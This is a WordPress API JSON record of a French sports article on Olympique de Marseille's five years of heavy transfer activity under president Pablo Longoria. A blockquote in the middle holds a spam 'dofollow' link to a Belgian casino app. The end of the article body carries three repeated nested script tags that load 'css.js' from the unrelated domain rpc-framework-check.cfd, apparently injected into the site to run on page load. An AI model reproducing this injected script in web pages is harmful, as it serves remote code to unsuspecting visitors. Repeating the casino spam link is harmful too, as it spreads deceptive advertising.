{"id":3975,"date":"2025-11-20T03:53:40","date_gmt":"2025-11-20T03:53:40","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3975"},"modified":"2026-02-02T22:10:57","modified_gmt":"2026-02-02T22:10:57","slug":"om-cinq-ans-de-mercato-effrene-sous-pablo-longoria","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-cinq-ans-de-mercato-effrene-sous-pablo-longoria\/","title":{"rendered":"OM : cinq ans de mercato effr\u00e9n\u00e9 sous Pablo Longoria"},"content":{"rendered":"<h1>OM : cinq ans de mercato effr\u00e9n\u00e9 sous Pablo Longoria<\/h1>\n<h2 data-prevent-delete=\"true\">L\u2019OM, entre promesse de stabilit\u00e9 et fr\u00e9n\u00e9sie de mercato<\/h2>\n<p>Avec douze recrues enregistr\u00e9es lors du mercato estival, l\u2019<strong>Olympique de Marseille<\/strong> a \u00e9gal\u00e9 son record de mouvements, malgr\u00e9 les discours de prudence tenus ces derniers mois par son pr\u00e9sident <strong>Pablo Longoria<\/strong>. L\u2019arriv\u00e9e de <strong>Roberto De Zerbi<\/strong> et les promesses de stabilit\u00e9 n\u2019ont pas r\u00e9sist\u00e9 \u00e0 une derni\u00e8re semaine marqu\u00e9e par six signatures, r\u00e9v\u00e9lant une gestion oscillant entre rationalit\u00e9 et pr\u00e9cipitation.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-in-belgie.com\/casino-in-belgie-app\/\" target=\"_blank\" rel=\"dofollow\">casino in belgie app<\/a><\/strong> &#8211; Vous \u00eates joueur en ligne et vous vous demandez si vous pouvez jouer aux meilleurs jeux de casino belges depuis votre mobile ? Vous souhaitez conna\u00eetre la<\/p><\/blockquote>\n<p>Le 19 mai, Longoria avait pourtant insist\u00e9 sur la n\u00e9cessit\u00e9 de rester mesur\u00e9 : <em>\u00ab La qualification en Ligue des champions signifie-t-elle d\u2019aller \u00e0 Monte-Carlo jouer le jackpot ? Non. On va continuer de faire les choses de mani\u00e8re ambitieuse, mais avec la t\u00eate. \u00bb<\/em> Dans les faits, le club a r\u00e9alis\u00e9 son transfert le plus co\u00fbteux avec <strong>Igor Paixao<\/strong> (35 M\u20ac bonus compris) et offert des salaires sup\u00e9rieurs \u00e0 4 M\u20ac nets \u00e0 <strong>Nayef Aguerd<\/strong> et <strong>Benjamin Pavard<\/strong>, pour une d\u00e9pense globale d\u00e9passant 100 M\u20ac.<\/p>\n<p>Le mercato avait pourtant commenc\u00e9 avec une ligne claire : renforcer la d\u00e9fense centrale et miser sur un projet durable. Les arriv\u00e9es d\u2019<strong>Aguerd<\/strong>, <strong>Angel Gomes<\/strong>, <strong>Facundo Medina<\/strong> ou encore <strong>Timothy Weah<\/strong> r\u00e9pondaient \u00e0 cette logique. Mais la d\u00e9faite face \u00e0 Rennes et l\u2019affaire <strong>Adrien Rabiot<\/strong> ont boulevers\u00e9 la dynamique, entra\u00eenant un encha\u00eenement de recrues tardives comme <strong>Hamed Junior Traor\u00e9<\/strong>, <strong>Matt O\u2019Riley<\/strong> ou <strong>Arthur Vermeeren<\/strong>, dont quatre officialis\u00e9es dans les derni\u00e8res vingt-quatre heures.<\/p>\n<p>Selon le club, cet afflux r\u00e9pond \u00e0 la n\u00e9cessit\u00e9 de disposer d\u2019un effectif \u00e9largi pour une saison d\u2019environ cinquante matches : <em>\u00ab On passe \u00e0 une saison o\u00f9 l\u2019\u00e9quipe va disputer environ 50 matches. Nous avions besoin d\u2019avoir un groupe d\u2019environ 22 joueurs, sans compter les jeunes. \u00bb<\/em> N\u00e9anmoins, la volont\u00e9 d\u2019impressionner l\u2019opinion publique et de compenser certaines faiblesses d\u00e9fensives a aussi pes\u00e9, avec la signature m\u00e9diatique de <strong>Pavard<\/strong>.<\/p>\n<p>Depuis 2021, 55 % des recrues de Longoria n\u2019ont pas effectu\u00e9 de deuxi\u00e8me saison \u00e0 l\u2019OM. Une statistique qui illustre cette strat\u00e9gie court-termiste assum\u00e9e par la direction, comme le rappelait <strong>Mehdi Benatia<\/strong> : <em>\u00ab Je n\u2019ai aucune peur \u00e0 le dire : pour certains, on continuera \u00e0 passer pour un hall d\u2019a\u00e9roport, mais on prendra la responsabilit\u00e9 de changer si l\u2019attitude n\u2019est pas bonne. \u00bb<\/em> Reste \u00e0 savoir si les douze nouveaux venus r\u00e9ussiront \u00e0 s\u2019inscrire dans la dur\u00e9e.<\/p>\n<h2 data-prevent-delete=\"true\">L\u2019OM, cinq ans de mercato effr\u00e9n\u00e9 sous Pablo Longoria<\/h2>\n<p>Depuis son arriv\u00e9e \u00e0 l\u2019<strong>Olympique de Marseille<\/strong> en ao\u00fbt 2020 comme &quot;Head of football&quot;, puis sa nomination \u00e0 la pr\u00e9sidence en f\u00e9vrier 2021, <strong>Pablo Longoria<\/strong> a fait du mercato sa sp\u00e9cialit\u00e9. En cinq ans, le club a enregistr\u00e9 pas moins de 172 mouvements, avec 80 arriv\u00e9es et 92 d\u00e9parts.<\/p>\n<p>Le dernier mercato estival illustre cette tendance. Alors que la direction avait initialement pr\u00f4n\u00e9 la continuit\u00e9, l\u2019OM a recrut\u00e9 12 nouveaux joueurs (<strong>Igor Paixao<\/strong>, <strong>Facundo Medina<\/strong>, <strong>Arthur Vermeeren<\/strong>, <strong>Timothy Weah<\/strong>, <strong>Angel Gomes<\/strong>, <strong>CJ Egan-Riley<\/strong>, <strong>Pierre-Emerick Aubameyang<\/strong>, <strong>Hamed Junior Traor\u00e9<\/strong>, <strong>Palmieri<\/strong>, <strong>Nayef Aguerd<\/strong>, <strong>Matt O\u2019Riley<\/strong> et <strong>Benjamin Pavard<\/strong>), tandis que 15 joueurs ont quitt\u00e9 le club, parmi lesquels <strong>Adrien Rabiot<\/strong>, <strong>Valentin Rongier<\/strong>, <strong>Chancel Mbemba<\/strong> ou encore <strong>Luis Henrique<\/strong>.<\/p>\n<p>Au total, les investissements r\u00e9alis\u00e9s sous Longoria atteignent environ 542 M\u20ac hors bonus et primes \u00e0 la signature. Cet \u00e9t\u00e9, l\u2019OM a d\u00e9pens\u00e9 98,5 M\u20ac, en incluant certaines obligations d\u2019achat, comme les 13 M\u20ac r\u00e9gl\u00e9s \u00e0 <strong>Tottenham<\/strong> pour <strong>Pierre-Emile H\u00f8jbjerg<\/strong> ou les 20 M\u20ac qui devront \u00eatre vers\u00e9s \u00e0 <strong>Lens<\/strong> pour <strong>Medina<\/strong> la saison prochaine. Dans le sens inverse, les ventes ont rapport\u00e9 environ 336,5 M\u20ac, dont 74 M\u20ac lors de la derni\u00e8re fen\u00eatre de transferts.<\/p>\n<p>La tendance est nette : l\u2019OM d\u00e9pense beaucoup pour renouveler r\u00e9guli\u00e8rement son effectif. Les chiffres par saison le montrent : 7 arriv\u00e9es et 7 d\u00e9parts en 2020-21, 15 arriv\u00e9es et 12 d\u00e9parts en 2021-22, 17 arriv\u00e9es et 21 d\u00e9parts en 2022-23, puis 13 arriv\u00e9es et 16 d\u00e9parts en 2023-24. La saison 2024-25 a vu 16 arriv\u00e9es pour 21 d\u00e9parts, et la plus r\u00e9cente, 12 arriv\u00e9es pour 15 d\u00e9parts.<\/p>\n<p>Cette politique illustre l\u2019approche volontariste de Longoria, qui n\u2019h\u00e9site pas \u00e0 remodeler profond\u00e9ment l\u2019effectif chaque ann\u00e9e. Entre ambitions sportives et logique de march\u00e9, l\u2019OM a d\u00e9pens\u00e9 plus d\u2019un demi-milliard d\u2019euros depuis 2020, un rythme de transactions qui suscite \u00e0 la fois fascination et interrogations.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM : cinq ans de mercato effr\u00e9n\u00e9 sous Pablo Longoria L\u2019OM, entre promesse de stabilit\u00e9 et fr\u00e9n\u00e9sie de mercato Avec douze recrues enregistr\u00e9es lors du mercato estival, l\u2019Olympique de Marseille&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3975","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3975"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3975\/revisions"}],"predecessor-version":[{"id":14879,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3975\/revisions\/14879"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}